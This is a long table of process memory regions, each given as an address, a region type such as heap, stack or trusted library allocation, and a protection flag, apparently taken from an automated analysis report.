|
2548000
|
heap
|
page execute and read and write
|
||
|
268E000
|
stack
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
1F70000
|
heap
|
page read and write
|
||
|
7FE88D40000
|
trusted library allocation
|
page read and write
|
||
|
3C98000
|
heap
|
page read and write
|
||
|
154000
|
heap
|
page read and write
|
||
|
150000
|
heap
|
page read and write
|
||
|
21ED000
|
stack
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
23C3000
|
trusted library allocation
|
page read and write
|
||
|
1D06000
|
heap
|
page read and write
|
||
|
4E1000
|
heap
|
page read and write
|
||
|
44B5000
|
heap
|
page read and write
|
||
|
1C57F000
|
stack
|
page read and write
|
||
|
1AA19000
|
stack
|
page read and write
|
||
|
2AA000
|
heap
|
page read and write
|
||
|
3BC8000
|
heap
|
page read and write
|
||
|
366000
|
heap
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
4529000
|
heap
|
page read and write
|
||
|
3AC000
|
heap
|
page read and write
|
||
|
42EB000
|
heap
|
page read and write
|
||
|
3810000
|
trusted library allocation
|
page read and write
|
||
|
1A227000
|
heap
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
2697000
|
trusted library allocation
|
page read and write
|
||
|
2B2000
|
heap
|
page read and write
|
||
|
3CBF000
|
heap
|
page read and write
|
||
|
520000
|
direct allocation
|
page read and write
|
||
|
3E66000
|
trusted library allocation
|
page read and write
|
||
|
12160000
|
trusted library allocation
|
page read and write
|
||
|
37F000
|
heap
|
page read and write
|
||
|
3CAD000
|
heap
|
page read and write
|
||
|
1BEA5000
|
heap
|
page read and write
|
||
|
23A000
|
heap
|
page read and write
|
||
|
33A8000
|
heap
|
page read and write
|
||
|
625000
|
heap
|
page read and write
|
||
|
3BF000
|
heap
|
page read and write
|
||
|
3372000
|
heap
|
page read and write
|
||
|
2CC9000
|
trusted library allocation
|
page read and write
|
||
|
1AA50000
|
heap
|
page read and write
|
||
|
3400000
|
direct allocation
|
page read and write
|
||
|
7FE88D3D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CD0000
|
trusted library allocation
|
page read and write
|
||
|
399F000
|
stack
|
page read and write
|
||
|
7FE89030000
|
trusted library allocation
|
page read and write
|
||
|
2CD0000
|
trusted library allocation
|
page read and write
|
||
|
377000
|
heap
|
page read and write
|
||
|
419D000
|
heap
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
1C6CE000
|
stack
|
page read and write
|
||
|
490000
|
heap
|
page read and write
|
||
|
2CE0000
|
heap
|
page read and write
|
||
|
3CAB000
|
heap
|
page read and write
|
||
|
3E1000
|
heap
|
page read and write
|
||
|
40F000
|
heap
|
page read and write
|
||
|
3F1000
|
heap
|
page read and write
|
||
|
3370000
|
heap
|
page read and write
|
||
|
213000
|
heap
|
page read and write
|
||
|
24F000
|
heap
|
page read and write
|
||
|
2294000
|
trusted library allocation
|
page read and write
|
||
|
4540000
|
heap
|
page read and write
|
||
|
44FB000
|
heap
|
page read and write
|
||
|
2C0000
|
heap
|
page read and write
|
||
|
3BB0000
|
trusted library allocation
|
page read and write
|
||
|
1DC0000
|
direct allocation
|
page read and write
|
||
|
21A7000
|
trusted library allocation
|
page read and write
|
||
|
25D000
|
heap
|
page read and write
|
||
|
225000
|
heap
|
page read and write
|
||
|
2CAF000
|
trusted library allocation
|
page read and write
|
||
|
26E4000
|
trusted library allocation
|
page read and write
|
||
|
685000
|
heap
|
page read and write
|
||
|
3D8000
|
stack
|
page read and write
|
||
|
33E0000
|
direct allocation
|
page read and write
|
||
|
1AF50000
|
heap
|
page read and write
|
||
|
1D80000
|
heap
|
page read and write
|
||
|
3742000
|
heap
|
page read and write
|
||
|
339F000
|
heap
|
page read and write
|
||
|
1F0000
|
trusted library allocation
|
page read and write
|
||
|
2681000
|
trusted library allocation
|
page read and write
|
||
|
406F000
|
heap
|
page read and write
|
||
|
160000
|
trusted library allocation
|
page read and write
|
||
|
42E8000
|
heap
|
page read and write
|
||
|
399000
|
heap
|
page read and write
|
||
|
23B8000
|
trusted library allocation
|
page read and write
|
||
|
2563000
|
trusted library allocation
|
page read and write
|
||
|
42F2000
|
heap
|
page read and write
|
||
|
3701000
|
heap
|
page read and write
|
||
|
343000
|
heap
|
page read and write
|
||
|
2697000
|
trusted library allocation
|
page read and write
|
||
|
1A5A4000
|
heap
|
page execute and read and write
|
||
|
4532000
|
heap
|
page read and write
|
||
|
510000
|
heap
|
page read and write
|
||
|
44CA000
|
heap
|
page read and write
|
||
|
236000
|
heap
|
page read and write
|
||
|
520000
|
heap
|
page read and write
|
||
|
2565000
|
trusted library allocation
|
page read and write
|
||
|
1E00000
|
heap
|
page read and write
|
||
|
38B0000
|
trusted library allocation
|
page read and write
|
||
|
2693000
|
trusted library allocation
|
page read and write
|
||
|
42DA000
|
heap
|
page read and write
|
||
|
150000
|
trusted library allocation
|
page read and write
|
||
|
38B000
|
heap
|
page read and write
|
||
|
26FF000
|
stack
|
page read and write
|
||
|
436E000
|
heap
|
page read and write
|
||
|
62E6000
|
trusted library allocation
|
page read and write
|
||
|
7FE88D63000
|
trusted library allocation
|
page read and write
|
||
|
3C41000
|
heap
|
page read and write
|
||
|
3C3000
|
heap
|
page read and write
|
||
|
228B000
|
trusted library allocation
|
page read and write
|
||
|
D0000
|
heap
|
page read and write
|
||
|
240B000
|
trusted library allocation
|
page read and write
|
||
|
3700000
|
heap
|
page read and write
|
||
|
503000
|
heap
|
page read and write
|
||
|
7FE89080000
|
trusted library allocation
|
page read and write
|
||
|
38D000
|
heap
|
page read and write
|
||
|
2A66000
|
trusted library allocation
|
page read and write
|
||
|
1C419000
|
heap
|
page read and write
|
||
|
283000
|
stack
|
page read and write
|
||
|
359000
|
heap
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
2356000
|
heap
|
page read and write
|
||
|
3753000
|
heap
|
page read and write
|
||
|
23BE000
|
trusted library allocation
|
page read and write
|
||
|
310000
|
heap
|
page read and write
|
||
|
6CE6000
|
trusted library allocation
|
page read and write
|
||
|
7FE88D34000
|
trusted library allocation
|
page read and write
|
||
|
452B000
|
heap
|
page read and write
|
||
|
4363000
|
heap
|
page read and write
|
||
|
3B3000
|
heap
|
page read and write
|
||
|
240B000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
3810000
|
trusted library allocation
|
page read and write
|
||
|
465000
|
heap
|
page read and write
|
||
|
4520000
|
heap
|
page read and write
|
||
|
425000
|
heap
|
page read and write
|
||
|
7FE88F30000
|
trusted library allocation
|
page read and write
|
||
|
245000
|
heap
|
page read and write
|
||
|
1A8E8000
|
heap
|
page execute and read and write
|
||
|
4532000
|
heap
|
page read and write
|
||
|
309000
|
heap
|
page read and write
|
||
|
4510000
|
heap
|
page read and write
|
||
|
1DE0000
|
direct allocation
|
page read and write
|
||
|
3C99000
|
heap
|
page read and write
|
||
|
1A8CF000
|
stack
|
page read and write
|
||
|
1B30000
|
heap
|
page read and write
|
||
|
4701000
|
heap
|
page read and write
|
||
|
32F0000
|
heap
|
page read and write
|
||
|
3BB0000
|
trusted library allocation
|
page read and write
|
||
|
1C1A0000
|
heap
|
page read and write
|
||
|
66A000
|
heap
|
page read and write
|
||
|
1A150000
|
heap
|
page read and write
|
||
|
7FE89070000
|
trusted library allocation
|
page read and write
|
||
|
7FE88F40000
|
trusted library allocation
|
page read and write
|
||
|
44F000
|
heap
|
page read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
12E000
|
heap
|
page read and write
|
||
|
3C9C000
|
heap
|
page read and write
|
||
|
497000
|
heap
|
page read and write
|
||
|
230000
|
heap
|
page read and write
|
||
|
3EA000
|
heap
|
page read and write
|
||
|
3ED000
|
heap
|
page read and write
|
||
|
2C10000
|
trusted library allocation
|
page read and write
|
||
|
1C1DE000
|
heap
|
page read and write
|
||
|
7FE89000000
|
trusted library allocation
|
page read and write
|
||
|
3B9000
|
heap
|
page read and write
|
||
|
2CD0000
|
trusted library allocation
|
page read and write
|
||
|
3C93000
|
heap
|
page read and write
|
||
|
1AA37000
|
heap
|
page read and write
|
||
|
44F1000
|
heap
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
32F000
|
heap
|
page read and write
|
||
|
1F3E000
|
stack
|
page read and write
|
||
|
44F2000
|
heap
|
page read and write
|
||
|
42E8000
|
heap
|
page read and write
|
||
|
33AF000
|
heap
|
page read and write
|
||
|
3E7E000
|
stack
|
page read and write
|
||
|
3F62000
|
heap
|
page read and write
|
||
|
7FE88F00000
|
trusted library allocation
|
page execute and read and write
|
||
|
3480000
|
direct allocation
|
page read and write
|
||
|
386000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
3DA000
|
heap
|
page read and write
|
||
|
3AB000
|
heap
|
page read and write
|
||
|
204F000
|
stack
|
page read and write
|
||
|
1C580000
|
heap
|
page read and write
|
||
|
27F000
|
heap
|
page read and write
|
||
|
228B000
|
heap
|
page read and write
|
||
|
2CD0000
|
trusted library allocation
|
page read and write
|
||
|
41F000
|
heap
|
page read and write
|
||
|
230000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
50C000
|
heap
|
page read and write
|
||
|
3377000
|
heap
|
page read and write
|
||
|
1A91E000
|
heap
|
page execute and read and write
|
||
|
447000
|
heap
|
page read and write
|
||
|
3CB9000
|
heap
|
page read and write
|
||
|
1AF5F000
|
stack
|
page read and write
|
||
|
4721000
|
heap
|
page read and write
|
||
|
2A2000
|
heap
|
page read and write
|
||
|
379000
|
heap
|
page read and write
|
||
|
1FD7000
|
direct allocation
|
page read and write
|
||
|
7FE88EF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
41A000
|
heap
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
407000
|
heap
|
page read and write
|
||
|
2A2000
|
heap
|
page read and write
|
||
|
3CAE000
|
heap
|
page read and write
|
||
|
477000
|
direct allocation
|
page read and write
|
||
|
33AF000
|
heap
|
page read and write
|
||
|
42F2000
|
heap
|
page read and write
|
||
|
433000
|
heap
|
page read and write
|
||
|
498000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
3F1000
|
heap
|
page read and write
|
||
|
3C55000
|
heap
|
page read and write
|
||
|
2400000
|
heap
|
page read and write
|
||
|
7FE88DE6000
|
trusted library allocation
|
page read and write
|
||
|
37F000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
4700000
|
heap
|
page read and write
|
||
|
4361000
|
heap
|
page read and write
|
||
|
612000
|
heap
|
page read and write
|
||
|
328000
|
heap
|
page read and write
|
||
|
41C7000
|
heap
|
page read and write
|
||
|
12181000
|
trusted library allocation
|
page read and write
|
||
|
130000
|
trusted library allocation
|
page read and write
|
||
|
7FE88F50000
|
trusted library allocation
|
page read and write
|
||
|
7FE88F32000
|
trusted library allocation
|
page read and write
|
||
|
3741000
|
heap
|
page read and write
|
||
|
1A8E0000
|
heap
|
page execute and read and write
|
||
|
7FE88F20000
|
trusted library allocation
|
page execute and read and write
|
||
|
460000
|
trusted library allocation
|
page read and write
|
||
|
1FB0000
|
direct allocation
|
page read and write
|
||
|
23F0000
|
trusted library allocation
|
page read and write
|
||
|
4529000
|
heap
|
page read and write
|
||
|
2A5000
|
heap
|
page read and write
|
||
|
1D40000
|
heap
|
page execute and read and write
|
||
|
1D84000
|
heap
|
page read and write
|
||
|
436C000
|
heap
|
page read and write
|
||
|
1C218000
|
heap
|
page read and write
|
||
|
330000
|
heap
|
page read and write
|
||
|
3C9A000
|
heap
|
page read and write
|
||
|
380000
|
heap
|
page read and write
|
||
|
3CD000
|
direct allocation
|
page read and write
|
||
|
1C990000
|
heap
|
page read and write
|
||
|
4F4000
|
heap
|
page read and write
|
||
|
33C0000
|
direct allocation
|
page read and write
|
||
|
25D000
|
heap
|
page read and write
|
||
|
240B000
|
trusted library allocation
|
page read and write
|
||
|
7FE89090000
|
trusted library allocation
|
page read and write
|
||
|
374C000
|
heap
|
page read and write
|
||
|
40F000
|
heap
|
page read and write
|
||
|
48C000
|
heap
|
page read and write
|
||
|
4556000
|
heap
|
page read and write
|
||
|
7FE88F03000
|
trusted library allocation
|
page read and write
|
||
|
2292000
|
trusted library allocation
|
page read and write
|
||
|
2AA000
|
heap
|
page read and write
|
||
|
23AF000
|
stack
|
page read and write
|
||
|
1C30000
|
trusted library allocation
|
page read and write
|
||
|
3CB9000
|
heap
|
page read and write
|
||
|
477000
|
heap
|
page read and write
|
||
|
350C000
|
trusted library allocation
|
page read and write
|
||
|
4FC000
|
heap
|
page read and write
|
||
|
2CD5000
|
trusted library allocation
|
page read and write
|
||
|
20D0000
|
heap
|
page read and write
|
||
|
2D0000
|
heap
|
page read and write
|
||
|
241000
|
heap
|
page read and write
|
||
|
41F000
|
heap
|
page read and write
|
||
|
401C000
|
heap
|
page read and write
|
||
|
346000
|
heap
|
page read and write
|
||
|
2151000
|
trusted library allocation
|
page read and write
|
||
|
268B000
|
trusted library allocation
|
page read and write
|
||
|
3752000
|
heap
|
page read and write
|
||
|
32F000
|
heap
|
page read and write
|
||
|
3E71000
|
heap
|
page read and write
|
||
|
4701000
|
heap
|
page read and write
|
||
|
3736000
|
heap
|
page read and write
|
||
|
3E7000
|
heap
|
page read and write
|
||
|
349000
|
heap
|
page read and write
|
||
|
106000
|
heap
|
page read and write
|
||
|
32AC000
|
stack
|
page read and write
|
||
|
200000
|
heap
|
page read and write
|
||
|
4526000
|
heap
|
page read and write
|
||
|
7FE89060000
|
trusted library allocation
|
page read and write
|
||
|
3ED000
|
heap
|
page read and write
|
||
|
3398000
|
heap
|
page read and write
|
||
|
1FD0000
|
direct allocation
|
page read and write
|
||
|
3743000
|
heap
|
page read and write
|
||
|
319F000
|
stack
|
page read and write
|
||
|
3749000
|
heap
|
page read and write
|
||
|
337D000
|
heap
|
page read and write
|
||
|
383000
|
heap
|
page read and write
|
||
|
5A8000
|
heap
|
page read and write
|
||
|
2285000
|
trusted library allocation
|
page read and write
|
||
|
2CC9000
|
trusted library allocation
|
page read and write
|
||
|
3B0000
|
heap
|
page read and write
|
||
|
3C91000
|
heap
|
page read and write
|
||
|
3493000
|
direct allocation
|
page read and write
|
||
|
7FE88F40000
|
trusted library allocation
|
page execute and read and write
|
||
|
3C8F000
|
heap
|
page read and write
|
||
|
4540000
|
heap
|
page read and write
|
||
|
519000
|
heap
|
page read and write
|
||
|
406000
|
heap
|
page read and write
|
||
|
3C08000
|
heap
|
page read and write
|
||
|
4545000
|
heap
|
page read and write
|
||
|
38A9000
|
trusted library allocation
|
page read and write
|
||
|
2DE000
|
heap
|
page read and write
|
||
|
46EF000
|
heap
|
page read and write
|
||
|
42F3000
|
heap
|
page read and write
|
||
|
27F0000
|
trusted library allocation
|
page read and write
|
||
|
613000
|
heap
|
page read and write
|
||
|
7FE89010000
|
trusted library allocation
|
page read and write
|
||
|
617000
|
heap
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
4532000
|
heap
|
page read and write
|
||
|
4530000
|
heap
|
page read and write
|
||
|
4069000
|
heap
|
page read and write
|
||
|
3D3000
|
heap
|
page read and write
|
||
|
31C000
|
heap
|
page read and write
|
||
|
4363000
|
heap
|
page read and write
|
||
|
331A000
|
heap
|
page read and write
|
||
|
7FE88F10000
|
trusted library allocation
|
page execute and read and write
|
||
|
41A000
|
heap
|
page read and write
|
||
|
23CD000
|
trusted library allocation
|
page read and write
|
||
|
64E000
|
heap
|
page read and write
|
||
|
4705000
|
heap
|
page read and write
|
||
|
42F2000
|
heap
|
page read and write
|
||
|
1E2000
|
stack
|
page read and write
|
||
|
3CB7000
|
heap
|
page read and write
|
||
|
679000
|
heap
|
page read and write
|
||
|
3710000
|
heap
|
page read and write
|
||
|
4490000
|
heap
|
page read and write
|
||
|
357D000
|
trusted library allocation
|
page read and write
|
||
|
2CC9000
|
trusted library allocation
|
page read and write
|
||
|
4019000
|
heap
|
page read and write
|
||
|
3DA000
|
heap
|
page read and write
|
||
|
1E34000
|
heap
|
page read and write
|
||
|
7FE88E50000
|
trusted library allocation
|
page execute and read and write
|
||
|
60D000
|
heap
|
page read and write
|
||
|
2A5000
|
heap
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
3DB000
|
heap
|
page read and write
|
||
|
228A000
|
trusted library allocation
|
page read and write
|
||
|
2DA0000
|
heap
|
page read and write
|
||
|
4556000
|
heap
|
page read and write
|
||
|
2292000
|
trusted library allocation
|
page read and write
|
||
|
436C000
|
heap
|
page read and write
|
||
|
3C4000
|
heap
|
page read and write
|
||
|
442000
|
heap
|
page read and write
|
||
|
4540000
|
heap
|
page read and write
|
||
|
451B000
|
heap
|
page read and write
|
||
|
1A83F000
|
stack
|
page read and write
|
||
|
3F1000
|
heap
|
page read and write
|
||
|
4556000
|
heap
|
page read and write
|
||
|
1FD7000
|
direct allocation
|
page read and write
|
||
|
232000
|
heap
|
page read and write
|
||
|
4BC0000
|
trusted library allocation
|
page read and write
|
||
|
2CC9000
|
trusted library allocation
|
page read and write
|
||
|
33AF000
|
heap
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
3382000
|
heap
|
page read and write
|
||
|
465000
|
heap
|
page read and write
|
||
|
7FE89030000
|
trusted library allocation
|
page read and write
|
||
|
1C44000
|
heap
|
page read and write
|
||
|
28C000
|
heap
|
page read and write
|
||
|
40A000
|
heap
|
page read and write
|
||
|
610000
|
heap
|
page read and write
|
||
|
337D000
|
heap
|
page read and write
|
||
|
4067000
|
heap
|
page read and write
|
||
|
4721000
|
heap
|
page read and write
|
||
|
21F000
|
heap
|
page read and write
|
||
|
2287000
|
trusted library allocation
|
page read and write
|
||
|
3EA6000
|
heap
|
page read and write
|
||
|
359000
|
heap
|
page read and write
|
||
|
2B8000
|
heap
|
page read and write
|
||
|
210000
|
heap
|
page read and write
|
||
|
44F4000
|
heap
|
page read and write
|
||
|
330000
|
heap
|
page read and write
|
||
|
3BDD000
|
heap
|
page read and write
|
||
|
412000
|
heap
|
page read and write
|
||
|
5A4000
|
heap
|
page read and write
|
||
|
3C9E000
|
heap
|
page read and write
|
||
|
2292000
|
trusted library allocation
|
page read and write
|
||
|
505000
|
heap
|
page read and write
|
||
|
377000
|
heap
|
page read and write
|
||
|
4C09000
|
heap
|
page read and write
|
||
|
2AF000
|
heap
|
page read and write
|
||
|
3ED000
|
heap
|
page read and write
|
||
|
4CE000
|
heap
|
page read and write
|
||
|
42EA000
|
heap
|
page read and write
|
||
|
4529000
|
heap
|
page read and write
|
||
|
3C9F000
|
heap
|
page read and write
|
||
|
33A1000
|
heap
|
page read and write
|
||
|
3CB9000
|
heap
|
page read and write
|
||
|
44BC000
|
heap
|
page read and write
|
||
|
3CAE000
|
heap
|
page read and write
|
||
|
35A000
|
heap
|
page read and write
|
||
|
3CBB000
|
heap
|
page read and write
|
||
|
3800000
|
trusted library allocation
|
page read and write
|
||
|
23BA000
|
trusted library allocation
|
page read and write
|
||
|
5A0000
|
heap
|
page read and write
|
||
|
7FE88FF0000
|
trusted library allocation
|
page read and write
|
||
|
451B000
|
heap
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
2BD000
|
heap
|
page read and write
|
||
|
2AC0000
|
trusted library allocation
|
page read and write
|
||
|
7FE88FD0000
|
trusted library allocation
|
page read and write
|
||
|
2A21000
|
trusted library allocation
|
page read and write
|
||
|
25D000
|
heap
|
page read and write
|
||
|
1C90000
|
heap
|
page read and write
|
||
|
44F1000
|
heap
|
page read and write
|
||
|
4540000
|
heap
|
page read and write
|
||
|
44FB000
|
heap
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
1C010000
|
heap
|
page read and write
|
||
|
3A8000
|
stack
|
page read and write
|
||
|
42AE000
|
heap
|
page read and write
|
||
|
4268000
|
heap
|
page read and write
|
||
|
1F9B000
|
heap
|
page read and write
|
||
|
1D50000
|
heap
|
page read and write
|
||
|
4BC0000
|
trusted library allocation
|
page read and write
|
||
|
37F000
|
heap
|
page read and write
|
||
|
1D3000
|
stack
|
page read and write
|
||
|
1D54000
|
heap
|
page read and write
|
||
|
4556000
|
heap
|
page read and write
|
||
|
23CE000
|
trusted library allocation
|
page read and write
|
||
|
7FE88D33000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CD5000
|
trusted library allocation
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
280000
|
heap
|
page read and write
|
||
|
2CC9000
|
trusted library allocation
|
page read and write
|
||
|
1B024000
|
heap
|
page read and write
|
||
|
451F000
|
heap
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
2C0000
|
heap
|
page read and write
|
||
|
2BA000
|
heap
|
page read and write
|
||
|
1FEF000
|
stack
|
page read and write
|
||
|
1B18F000
|
stack
|
page read and write
|
||
|
2351000
|
trusted library allocation
|
page read and write
|
||
|
23C3000
|
trusted library allocation
|
page read and write
|
||
|
337C000
|
heap
|
page read and write
|
||
|
1A699000
|
stack
|
page read and write
|
||
|
1A59C000
|
stack
|
page read and write
|
||
|
240B000
|
trusted library allocation
|
page read and write
|
||
|
2A26000
|
trusted library allocation
|
page read and write
|
||
|
1DB6000
|
heap
|
page read and write
|
||
|
3EE7000
|
heap
|
page read and write
|
||
|
1A1A8000
|
heap
|
page read and write
|
||
|
3FE000
|
heap
|
page read and write
|
||
|
3B4000
|
heap
|
page read and write
|
||
|
452B000
|
heap
|
page read and write
|
||
|
44F3000
|
heap
|
page read and write
|
||
|
2569000
|
trusted library allocation
|
page read and write
|
||
|
1C1D8000
|
heap
|
page read and write
|
||
|
3FF000
|
heap
|
page read and write
|
||
|
3BD1000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
349000
|
heap
|
page read and write
|
||
|
2561000
|
trusted library allocation
|
page read and write
|
||
|
337C000
|
heap
|
page read and write
|
||
|
1B020000
|
heap
|
page read and write
|
||
|
44F1000
|
heap
|
page read and write
|
||
|
7FE88D4B000
|
trusted library allocation
|
page read and write
|
||
|
42F3000
|
heap
|
page read and write
|
||
|
33A1000
|
heap
|
page read and write
|
||
|
1E60000
|
heap
|
page read and write
|
||
|
1FE3000
|
direct allocation
|
page read and write
|
||
|
240B000
|
trusted library allocation
|
page read and write
|
||
|
23C7000
|
trusted library allocation
|
page read and write
|
||
|
7FE88E10000
|
trusted library allocation
|
page execute and read and write
|
||
|
3373000
|
heap
|
page read and write
|
||
|
42D6000
|
heap
|
page read and write
|
||
|
46F1000
|
heap
|
page read and write
|
||
|
377F000
|
stack
|
page read and write
|
||
|
1BFBA000
|
stack
|
page read and write
|
||
|
240B000
|
trusted library allocation
|
page read and write
|
||
|
2C40000
|
trusted library allocation
|
page read and write
|
||
|
1E65000
|
heap
|
page read and write
|
||
|
7FE89000000
|
trusted library allocation
|
page read and write
|
||
|
370F000
|
stack
|
page read and write
|
||
|
2CC000
|
heap
|
page read and write
|
||
|
420000
|
heap
|
page read and write
|
||
|
377000
|
heap
|
page read and write
|
||
|
216000
|
heap
|
page read and write
|
||
|
4490000
|
heap
|
page read and write
|
||
|
230000
|
heap
|
page read and write
|
||
|
7FE89080000
|
trusted library allocation
|
page read and write
|
||
|
2CD5000
|
trusted library allocation
|
page read and write
|
||
|
287000
|
heap
|
page read and write
|
||
|
1E30000
|
heap
|
page read and write
|
||
|
1E30000
|
heap
|
page read and write
|
||
|
3AE6000
|
trusted library allocation
|
page read and write
|
||
|
7FE88F20000
|
trusted library allocation
|
page execute and read and write
|
||
|
44EF000
|
heap
|
page read and write
|
||
|
67E000
|
heap
|
page read and write
|
||
|
331F000
|
stack
|
page read and write
|
||
|
2207000
|
trusted library allocation
|
page read and write
|
||
|
4529000
|
heap
|
page read and write
|
||
|
1B4C0000
|
heap
|
page read and write
|
||
|
232E000
|
trusted library allocation
|
page read and write
|
||
|
1E0000
|
heap
|
page read and write
|
||
|
2289000
|
trusted library allocation
|
page read and write
|
||
|
3C68000
|
heap
|
page read and write
|
||
|
4510000
|
heap
|
page read and write
|
||
|
7FE88FB0000
|
trusted library allocation
|
page read and write
|
||
|
2C7000
|
heap
|
page read and write
|
||
|
1C3FD000
|
heap
|
page read and write
|
||
|
1C6F0000
|
heap
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
2260000
|
remote allocation
|
page read and write
|
||
|
3F1000
|
heap
|
page read and write
|
||
|
2B8000
|
heap
|
page read and write
|
||
|
451F000
|
heap
|
page read and write
|
||
|
4726000
|
heap
|
page read and write
|
||
|
3D3000
|
heap
|
page read and write
|
||
|
33A1000
|
heap
|
page read and write
|
||
|
7FE88F0C000
|
trusted library allocation
|
page read and write
|
||
|
406B000
|
heap
|
page read and write
|
||
|
4D89000
|
heap
|
page read and write
|
||
|
2E94000
|
heap
|
page read and write
|
||
|
44FB000
|
heap
|
page read and write
|
||
|
3EFE000
|
stack
|
page read and write
|
||
|
46AE000
|
heap
|
page read and write
|
||
|
377000
|
heap
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
1EE6000
|
heap
|
page read and write
|
||
|
121C0000
|
trusted library allocation
|
page read and write
|
||
|
2CD0000
|
trusted library allocation
|
page read and write
|
||
|
497000
|
heap
|
page read and write
|
||
|
4222000
|
heap
|
page read and write
|
||
|
7FE88F54000
|
trusted library allocation
|
page read and write
|
||
|
2DC000
|
heap
|
page read and write
|
||
|
33A1000
|
heap
|
page read and write
|
||
|
3487000
|
direct allocation
|
page read and write
|
||
|
3C95000
|
heap
|
page read and write
|
||
|
44EF000
|
heap
|
page read and write
|
||
|
195000
|
stack
|
page read and write
|
||
|
238000
|
heap
|
page read and write
|
||
|
23CA000
|
trusted library allocation
|
page read and write
|
||
|
353F000
|
stack
|
page read and write
|
||
|
1AA8C000
|
heap
|
page read and write
|
||
|
4510000
|
heap
|
page read and write
|
||
|
311000
|
heap
|
page read and write
|
||
|
1E0000
|
heap
|
page read and write
|
||
|
1C1AE000
|
heap
|
page read and write
|
||
|
46F3000
|
heap
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
604000
|
heap
|
page read and write
|
||
|
23C2000
|
trusted library allocation
|
page read and write
|
||
|
38B5000
|
trusted library allocation
|
page read and write
|
||
|
3D8000
|
heap
|
page read and write
|
||
|
7FE88F90000
|
trusted library allocation
|
page read and write
|
||
|
322000
|
heap
|
page read and write
|
||
|
4209000
|
heap
|
page read and write
|
||
|
3FE000
|
heap
|
page read and write
|
||
|
3D0000
|
heap
|
page read and write
|
||
|
401D000
|
heap
|
page read and write
|
||
|
7FE88FE0000
|
trusted library allocation
|
page read and write
|
||
|
417000
|
heap
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
3F1E000
|
heap
|
page read and write
|
||
|
228D000
|
trusted library allocation
|
page read and write
|
||
|
257E000
|
heap
|
page execute and read and write
|
||
|
3DA000
|
heap
|
page read and write
|
||
|
1D80000
|
heap
|
page read and write
|
||
|
297C000
|
trusted library allocation
|
page read and write
|
||
|
46F000
|
trusted library allocation
|
page read and write
|
||
|
22D1000
|
trusted library allocation
|
page read and write
|
||
|
42F2000
|
heap
|
page read and write
|
||
|
7FE88E36000
|
trusted library allocation
|
page execute and read and write
|
||
|
E0000
|
heap
|
page read and write
|
||
|
44F4000
|
heap
|
page read and write
|
||
|
7FE88DEC000
|
trusted library allocation
|
page execute and read and write
|
||
|
406D000
|
heap
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
2CD5000
|
trusted library allocation
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
4A0000
|
heap
|
page read and write
|
||
|
3F8000
|
heap
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
29CF000
|
stack
|
page read and write
|
||
|
1DC000
|
stack
|
page read and write
|
||
|
4722000
|
heap
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
1C73F000
|
stack
|
page read and write
|
||
|
3C86000
|
heap
|
page read and write
|
||
|
472000
|
heap
|
page read and write
|
||
|
1C216000
|
heap
|
page read and write
|
||
|
425000
|
heap
|
page read and write
|
||
|
436C000
|
heap
|
page read and write
|
||
|
228D000
|
trusted library allocation
|
page read and write
|
||
|
240B000
|
trusted library allocation
|
page read and write
|
||
|
452B000
|
heap
|
page read and write
|
||
|
3F6000
|
heap
|
page read and write
|
||
|
1C3C0000
|
heap
|
page read and write
|
||
|
42EA000
|
heap
|
page read and write
|
||
|
7FE88D32000
|
trusted library allocation
|
page read and write
|
||
|
4E4000
|
heap
|
page read and write
|
||
|
3B7000
|
direct allocation
|
page read and write
|
||
|
2567000
|
trusted library allocation
|
page read and write
|
||
|
4B0000
|
direct allocation
|
page read and write
|
||
|
479000
|
heap
|
page read and write
|
||
|
239000
|
heap
|
page read and write
|
||
|
328000
|
heap
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
1AA42000
|
heap
|
page read and write
|
||
|
2A13000
|
trusted library allocation
|
page read and write
|
||
|
3800000
|
trusted library allocation
|
page read and write
|
||
|
3CF000
|
direct allocation
|
page read and write
|
||
|
7FE89040000
|
trusted library allocation
|
page read and write
|
||
|
452D000
|
heap
|
page read and write
|
||
|
